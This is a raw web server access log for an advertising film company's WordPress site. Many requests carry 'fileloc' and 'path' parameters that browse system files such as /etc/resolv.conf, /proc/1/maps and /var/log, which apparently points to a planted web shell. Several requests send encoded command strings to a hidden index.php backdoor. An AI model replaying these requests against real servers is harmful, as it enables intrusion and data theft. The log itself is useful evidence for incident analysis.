74.7.227.51 - - [09/Nov/2025:00:49:08 +0000] "GET /q-~234AJfaKPHg6cHiwgIMcfgrkVMN2TElrY34915/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/license.txt&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 10207 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:00:49:08 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fsys%2Fclass%2Finput%2Fevent4%2Fsubsystem%2Fmouse1%2Fsubsystem%2Finput3 HTTP/1.0" 200 3672 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
184.73.167.217 - - [09/Nov/2025:00:49:09 +0000] "GET /our-works/tvc-jokky/?path=//run/udisks2 HTTP/1.0" 200 2875 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.79.248.20 - - [09/Nov/2025:00:46:51 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323635323830392p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323634393230392q6464393039666534346162643433633632323961623731653132656330346630222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 200 211 "-" "-"
74.7.227.189 - - [09/Nov/2025:00:49:13 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory12/node0/memory1/subsystem/devices/memory2/power HTTP/1.0" 200 3583 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:49:13 +0000] "GET /q-~170fvCLeOavwMntU2Zh4sBSzfaRa6ZQkW4995/?path=/var/www/lamphim/data/www/lamphimquangcao.net/images HTTP/1.0" 200 3289 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:00:49:13 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fthread-self%2Froot%2Fsys%2Fclass%2Fpci_bus%2F0000%3A00%2Fdevice%2F0000%3A00%3A06.0%2Fpower%2Fruntime_enabled&path=%2F%2Fproc%2Fthread-self%2Froot%2Fsys%2Fclass%2Fpci_bus%2F0000%3A00%2Fdevice%2F0000%3A00%3A06.0%2Fpower HTTP/1.0" 200 2922 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
52.71.203.206 - - [09/Nov/2025:00:49:14 +0000] "GET /our-works/tvc-sjc/?fileloc=//bin/gpgconf&path=//bin HTTP/1.0" 200 2812 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:00:49:15 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory12/node0/memory7/subsystem/devices/memory1/power HTTP/1.0" 200 3582 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:49:17 +0000] "GET /q-~234AJfaKPHg6cHiwgIMcfgrkVMN2TElrY34915/?path=/var/www/lamphim/data/www/lamphimquangcao.net/images HTTP/1.0" 200 3289 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:00:49:18 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2Fself%2Froot%2Fsys%2Fclass%2Fblock%2Floop1%2Fsubsystem%2Floop1%2Fsubsystem%2Fsda15%2Fsubsystem%2Floop1 HTTP/1.0" 200 4146 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
98.84.60.17 - - [09/Nov/2025:00:49:18 +0000] "GET /our-works/tvc-bia-hello/?fileloc=//lib/sysctl.d/protect-links.conf&path=//lib/sysctl.d HTTP/1.0" 200 2992 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:00:49:19 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory12/node0/memory7/subsystem/devices/memory8/power HTTP/1.0" 200 3584 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:49:20 +0000] "GET /q-~43ZbNxfjW8thB1Lo4mKFmkIdKsCaQpld43634/?path=/var/www/lamphim/data/www/lamphimquangcao.net/images HTTP/1.0" 200 3289 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:00:49:22 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsys%2Fclass%2Fblock%2Floop7%2Fsubsystem%2Floop5%2Fdiscard_alignment&path=%2F%2Fsys%2Fclass%2Fblock%2Floop7%2Fsubsystem%2Floop5 HTTP/1.0" 200 2870 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.225.81.20 - - [09/Nov/2025:00:49:23 +0000] "GET /our-works/tvc-bia-hello/?fileloc=//lib/sysctl.d/protect-links.conf&path=//lib/sysctl.d HTTP/1.0" 200 2992 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:00:49:23 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory12/node0/memory7/subsystem/devices/memory6/subsystem/devices HTTP/1.0" 200 3692 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:49:23 +0000] "GET /q-~208oOY1abt1bmrlUNRhQNEiFShVPeBKpb27839/?path=/var/www/lamphim/data/www/lamphimquangcao.net/images HTTP/1.0" 200 3289 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
107.23.62.75 - - [09/Nov/2025:00:49:24 +0000] "GET /our-works/tv-commercial/tvc-thach-long-hai/?fileloc=//var/log/ubuntu-advantage.log.1&path=//var/log HTTP/1.0" 200 10601 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [09/Nov/2025:00:49:26 +0000] "GET /our-works/tv-commercial/'?fileloc=%2Fvar%2Fwww%2Flamphim%2Fdata%2Fwww%2Flamphimquangcao.net%2Fwp-content%2Fuploads%2Fsvimg13-150x150.jpg&path=%2Fvar%2Fwww%2Flamphim%2Fdata%2Fwww%2Flamphimquangcao.net%2Fwp-content%2Fuploads HTTP/1.0" 200 2906 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [09/Nov/2025:00:49:26 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory12/node0/memory7/subsystem/devices/memory6/power HTTP/1.0" 200 3584 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:49:27 +0000] "GET /q-~129ZydFhBKTAxpcDGFswXc7gRQ1tYnZsL36012/?path=/var/www/lamphim/data/www/lamphimquangcao.net/images HTTP/1.0" 200 3289 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:00:49:29 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory12/node0/memory7/subsystem/devices/memory2/power HTTP/1.0" 200 3585 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:00:49:29 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsys%2Fclass%2Finput%2Finput5%2Fdevice%2Fpower%2Fruntime_active_time&path=%2F%2Fsys%2Fclass%2Finput%2Finput5%2Fdevice%2Fpower HTTP/1.0" 200 2867 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [09/Nov/2025:00:49:30 +0000] "GET /q-~43ZbNxfjW8thB1Lo4mKFmkIdKsCaQpld43634/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/product.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3834 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.205.222.214 - - [09/Nov/2025:00:49:30 +0000] "GET /our-works/tvc-bia-hello/?fileloc=//usr/bin/more&path=//usr/bin HTTP/1.0" 200 2820 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:00:49:31 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory12/node0/memory1/subsystem/devices/memory1 HTTP/1.0" 200 3621 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:49:32 +0000] "GET /q-~234AJfaKPHg6cHiwgIMcfgrkVMN2TElrY34915/?path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 4759 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:00:49:32 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fsys%2Fclass%2Fblock%2Fsda1%2Fsubsystem%2Floop0%2Fqueue%2Fmax_segments&path=%2F%2Fsys%2Fclass%2Fblock%2Fsda1%2Fsubsystem%2Floop0%2Fqueue HTTP/1.0" 200 2881 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.248.20 - - [09/Nov/2025:00:47:14 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323635323833332p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323634393233332q3636646361633537343038653837653632376566623334366538353136346166222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 200 211 "-" "-"
52.167.144.233 - - [09/Nov/2025:00:49:36 +0000] "GET /?products=304384960 HTTP/1.0" 200 180 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
98.83.178.66 - - [09/Nov/2025:00:49:36 +0000] "GET /our-works/phim-viral-ila/?fileloc=//etc/resolv.conf&path=//etc HTTP/1.0" 200 3184 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:00:49:37 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory12/node0/memory7/subsystem/devices/memory8/subsystem/devices/memory9 HTTP/1.0" 200 3665 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:49:37 +0000] "GET /q-~129ZydFhBKTAxpcDGFswXc7gRQ1tYnZsL36012/?path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 4760 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:00:49:38 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Flocale%2Fkn%2FLC_MESSAGES%2Fiso_639_3.mo&path=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Flocale%2Fkn%2FLC_MESSAGES HTTP/1.0" 200 2900 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
35.171.117.160 - - [09/Nov/2025:00:49:39 +0000] "GET /our-works/tvc-bia-hello/?fileloc=//proc/1/maps&path=//proc/1 HTTP/1.0" 200 2818 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:00:49:39 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory12/node0/memory7/subsystem/devices/memory4 HTTP/1.0" 200 3626 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:49:40 +0000] "GET /q-~129ZydFhBKTAxpcDGFswXc7gRQ1tYnZsL36012/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/product.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3834 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
34.235.239.240 - - [09/Nov/2025:00:49:40 +0000] "GET /our-works/tv-commercial/tvc-thach-long-hai/?path=//sys/devices/LNXSYSTM:00 HTTP/1.0" 200 3469 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:00:49:41 +0000] "GET /q-~234AJfaKPHg6cHiwgIMcfgrkVMN2TElrY34915/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/product.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3834 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:00:49:41 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Fscripts%2Fcoccinelle%2Ffree HTTP/1.0" 200 3528 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [09/Nov/2025:00:49:42 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory11/node0/memory6/subsystem/devices/memory3 HTTP/1.0" 200 3625 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:49:42 +0000] "GET /q-~170fvCLeOavwMntU2Zh4sBSzfaRa6ZQkW4995/?path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 4760 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:49:44 +0000] "GET /q-~43ZbNxfjW8thB1Lo4mKFmkIdKsCaQpld43634/?path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 4760 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
34.203.111.15 - - [09/Nov/2025:00:49:44 +0000] "GET /our-works/tvc-bia-hello/?fileloc=//usr/bin/more&path=//usr/bin HTTP/1.0" 200 2820 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:00:49:45 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory12/node0/memory1/subsystem/devices/memory0 HTTP/1.0" 200 3623 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:00:49:45 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Flib%2Fudev%2Frules.d%2F99-systemd.rules&path=%2F%2Fusr%2Flib%2Fudev%2Frules.d HTTP/1.0" 200 4546 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [09/Nov/2025:00:49:46 +0000] "GET /q-~234AJfaKPHg6cHiwgIMcfgrkVMN2TElrY34915/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/readme.html&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 5908 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:49:47 +0000] "GET /q-~170fvCLeOavwMntU2Zh4sBSzfaRa6ZQkW4995/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/readme.html&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 5908 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:49:49 +0000] "GET /q-~129ZydFhBKTAxpcDGFswXc7gRQ1tYnZsL36012/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/readme.html&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 5908 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
44.205.74.196 - - [09/Nov/2025:00:49:51 +0000] "GET /our-works/tvc-lapatie-2/?path=//proc/77/map_files HTTP/1.0" 200 2883 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:00:49:52 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory12/node0/memory7/subsystem/devices/memory9/subsystem/devices/memory8 HTTP/1.0" 200 3665 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:00:49:52 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsnap%2Fcore20%2Fcurrent%2Fetc%2Fapparmor.d%2Fabstractions%2Fdbus-session&path=%2F%2Fsnap%2Fcore20%2Fcurrent%2Fetc%2Fapparmor.d%2Fabstractions HTTP/1.0" 200 3162 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [09/Nov/2025:00:49:53 +0000] "GET /q-~208oOY1abt1bmrlUNRhQNEiFShVPeBKpb27839/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/readme.html&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 5908 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.1.106.130 - - [09/Nov/2025:00:49:53 +0000] "GET /our-works/tvc-bia-hello/?fileloc=//usr/bin/tset&path=//usr/bin HTTP/1.0" 200 2820 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
52.167.144.233 - - [09/Nov/2025:00:49:54 +0000] "GET /?products=1597190260 HTTP/1.0" 200 25856 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:00:49:56 +0000] "GET /q-~208oOY1abt1bmrlUNRhQNEiFShVPeBKpb27839/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/product.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3834 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:00:49:56 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory12/node0/memory1/subsystem/devices/memory1/power HTTP/1.0" 200 3581 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.248.20 - - [09/Nov/2025:00:47:36 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323635323835362p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323634393235362q3463353632316132343962396230663434336634666262643061306230663965222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 200 211 "-" "-"
216.73.216.50 - - [09/Nov/2025:00:49:59 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fsys%2Fclass%2Fleds%2Finput1%3A%3Anumlock%2Fdevice%2Finput1%3A%3Ascrolllock%2Ftrigger&path=%2F%2Fsys%2Fclass%2Fleds%2Finput1%3A%3Anumlock%2Fdevice%2Finput1%3A%3Ascrolllock HTTP/1.0" 200 2992 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
23.22.105.143 - - [09/Nov/2025:00:49:59 +0000] "GET /our-works/tvc-bia-hello/?fileloc=//usr/bin/tset&path=//usr/bin HTTP/1.0" 200 2820 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:00:49:59 +0000] "GET /q-~208oOY1abt1bmrlUNRhQNEiFShVPeBKpb27839/?path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 4760 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:00:50:01 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory11/node0/memory6/subsystem/devices/memory8/subsystem/devices/memory2 HTTP/1.0" 200 3665 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.229.95.193 - - [09/Nov/2025:00:50:01 +0000] "GET /our-works/tvc-lapatie-2/?fileloc=//proc/self/timers&path=//proc/self HTTP/1.0" 200 2822 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:00:50:02 +0000] "GET /11nim37499.html?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/xmlrpc.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 4275 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:00:50:03 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fsys%2Fclass%2Fblock%2Floop5%2Fsubsystem%2Floop1%2Fsubsystem%2Floop2%2Fqueue%2Fdiscard_max_bytes&path=%2F%2Fsys%2Fclass%2Fblock%2Floop5%2Fsubsystem%2Floop1%2Fsubsystem%2Floop2%2Fqueue HTTP/1.0" 200 2903 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [09/Nov/2025:00:50:03 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory12/node0/memory1/subsystem/devices/memory1/subsystem HTTP/1.0" 200 3434 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:50:04 +0000] "GET /q-~37igPkiQbWWT6n5OtlkBe4WgYItEwNHR30562/?path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 4759 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
100.29.63.24 - - [09/Nov/2025:00:50:06 +0000] "GET /our-works/tvc-calci/?fileloc=//usr/bin/sync&path=//usr/bin HTTP/1.0" 200 2820 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:00:50:07 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory12/node0/memory7/subsystem/devices/memory9/subsystem/devices/memory3 HTTP/1.0" 200 3666 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:50:08 +0000] "GET /61aotk11625.html?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/pages.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3680 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
18.233.24.238 - - [09/Nov/2025:00:50:09 +0000] "GET /our-works/tvc-calci/?fileloc=//usr/bin/sync&path=//usr/bin HTTP/1.0" 200 2820 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:00:50:09 +0000] "GET /42cmm48234.html?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/click.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3819 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:00:50:11 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory11/node0/memory6/subsystem/devices/memory3/subsystem HTTP/1.0" 200 3437 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
